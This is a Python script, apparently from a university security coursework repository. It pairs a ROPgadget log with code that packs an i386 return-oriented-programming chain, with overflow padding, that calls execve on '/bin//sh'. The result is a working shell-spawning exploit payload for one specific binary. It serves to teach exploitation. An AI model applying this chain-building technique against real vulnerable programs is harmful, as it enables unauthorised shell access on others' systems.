security-cw/docs/script_reference.py
Liam Dalgarno b5ef4f9a27 Add example scripts
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
2020-11-28 17:40:49 +00:00


# ROP chain generation
# ===========================================================
# - Step 1 -- Write-what-where gadgets
# [+] Gadget found: 0x8056cf5 mov dword ptr [edx], eax ; ret
# [+] Gadget found: 0x806e23b pop edx ; ret
# [+] Gadget found: 0x80a89e6 pop eax ; ret
# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
# - Step 2 -- Init syscall number gadgets
# [+] Gadget found: 0x80562b0 xor eax, eax ; ret
# [+] Gadget found: 0x807b6da inc eax ; ret
# - Step 3 -- Init syscall arguments gadgets
# [+] Gadget found: 0x80481c9 pop ebx ; ret
# [+] Gadget found: 0x806e262 pop ecx ; pop ebx ; ret
# [+] Gadget found: 0x806e23b pop edx ; ret
# - Step 4 -- Syscall gadget
# [+] Gadget found: 0x80495f3 int 0x80
# - Step 5 -- Build the ROP chain
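#!/usr/bin/env python2
# execve generated by ROPgadget
"""Write the ROPgadget-generated execve chain (reference copy) to a file.

Usage: script_reference.py OUT_FILE

The bytes are reproduced unchanged from ROPgadget's "Step 5" output,
using the gadgets listed in the log above.  Read top to bottom, the chain
stores "/bin//sh" followed by a zero dword in .data, loads the i386
execve(2) registers (ebx = path, ecx = argv, edx = envp), counts eax from
0 up to syscall number 11 with the ``inc eax`` gadget, and finally issues
``int 0x80``.  Every address is absolute, so the chain only has meaning
for the exact binary the gadgets were harvested from (presumably a
non-PIE 32-bit build -- confirm against that binary's headers).
"""
from struct import pack
import sys

# Gadget addresses reported by ROPgadget (steps 1-4 of the log above).
POP_EDX_RET = 0x0806e23b          # pop edx ; ret
POP_EAX_RET = 0x080a89e6          # pop eax ; ret
MOV_EDX_EAX_RET = 0x08056cf5      # mov dword ptr [edx], eax ; ret
XOR_EAX_RET = 0x080562b0          # xor eax, eax ; ret
INC_EAX_RET = 0x0807b6da          # inc eax ; ret
POP_EBX_RET = 0x080481c9          # pop ebx ; ret
POP_ECX_POP_EBX_RET = 0x0806e262  # pop ecx ; pop ebx ; ret
INT_80 = 0x080495f3               # int 0x80

# Writable scratch area that receives the path string and the zero dword.
DATA = 0x080d9060                 # @ .data

# Filler in front of the chain; its length was chosen for the original
# target and is kept byte-for-byte.
PADDING = b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

# eax after one `xor eax, eax` and this many `inc eax` gadgets.
EXECVE_SYSCALL_NO = 11


def build_chain():
    """Return PADDING followed by the gadget chain as bytes.

    Integers in the list below are gadget or data addresses and are packed
    as little-endian 32-bit values; raw ``bytes`` entries are written as-is.
    The order matches the original ROPgadget output exactly.
    """
    chain = [
        # Step 1: write "/bin", "//sh" and a zero dword into .data.
        POP_EDX_RET, DATA,                    # edx = &.data
        POP_EAX_RET, b'/bin',                 # eax = "/bin"
        MOV_EDX_EAX_RET,
        POP_EDX_RET, DATA + 4,                # edx = &.data + 4
        POP_EAX_RET, b'//sh',                 # eax = "//sh"
        MOV_EDX_EAX_RET,
        POP_EDX_RET, DATA + 8,                # edx = &.data + 8
        XOR_EAX_RET,                          # eax = 0 (terminating dword)
        MOV_EDX_EAX_RET,
        # Step 3: syscall arguments.
        POP_EBX_RET, DATA,                    # ebx = path
        POP_ECX_POP_EBX_RET, DATA + 8, DATA,  # ecx = &zero; ebx reloaded
                                              # ("padding without overwrite ebx")
        POP_EDX_RET, DATA + 8,                # edx = &zero
        # Step 2: syscall number, built from 0 by repeated increments.
        XOR_EAX_RET,
    ] + [INC_EAX_RET] * EXECVE_SYSCALL_NO + [
        # Step 4: syscall gadget.
        INT_80,
    ]
    packed = [item if isinstance(item, bytes) else pack('<I', item)
              for item in chain]
    return PADDING + b''.join(packed)


def main(argv=None):
    """Write the chain to the path given as the single argument.

    *argv* defaults to ``sys.argv[1:]``.  Returns the process exit status:
    2 (with a usage line on stderr) when the argument is missing, else 0.
    """
    args = sys.argv[1:] if argv is None else argv
    # Guard against the bare IndexError the original raised without an argument.
    if len(args) != 1:
        sys.stderr.write("usage: %s OUT_FILE\n" % sys.argv[0])
        return 2
    out_file = args[0]
    with open(out_file, "wb") as f:
        f.write(build_chain())
    return 0


if __name__ == "__main__":
    sys.exit(main())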